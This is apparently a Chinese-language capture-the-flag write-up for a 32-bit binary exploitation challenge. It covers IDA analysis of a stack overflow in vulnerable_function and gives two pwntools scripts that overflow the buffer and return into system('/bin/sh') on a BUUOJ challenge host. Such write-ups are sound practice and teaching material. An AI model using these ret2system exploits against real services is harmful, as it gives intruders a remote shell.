一、查看文件
我们可以看到是32位,几乎没有开保护。
二、IDA反编译
我们拖到IDA中看看代码:
main函数中提到了一个 vulnerable_function();
我们看看这个函数 vulnerable_function():
显然是有栈溢出漏洞的。
既然有调用system函数,肯定是可以直接call一波的,只是还缺一个参数,我们看到了read函数心里不禁笑嘻嘻…
然而稍安勿躁,心存侥幸的看一波string:
妈耶~善良的出题人
代码
这里有两种方法
(1)
from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",26046)
syad=0x08048320 #system函数的位置
shad=0x0804a024 #/bin/sh的位置
p=b"a"*(0x88+0x04)+p32(syad)+p32(0)+p32(shad)#其中p32(0) 是执行system函数后的存储地址,可以找个合适的值替换。
r.recvuntil(b"Input:\n")
r.sendline(p)
r.interactive()
(2)
from pwn import*
from LibcSearcher import *
r=remote("node4.buuoj.cn",26046)
#syad=0x08048320
shad=0x0804a024 #/bin/sh 的位置
#0x0804849e 是call system函数的位置 只需后面加上/bin/sh 位置即可直接执行 不用再加一个地址作为存储
p=b"a"*(0x88+0x04)+p32(0x0804849e)+p32(shad)
r.recvuntil(b"Input:\n")
r.sendline(p)
r.interactive()
总结
要先看函数结构,在去看栈结构,system和/bin/sh的位置很重要。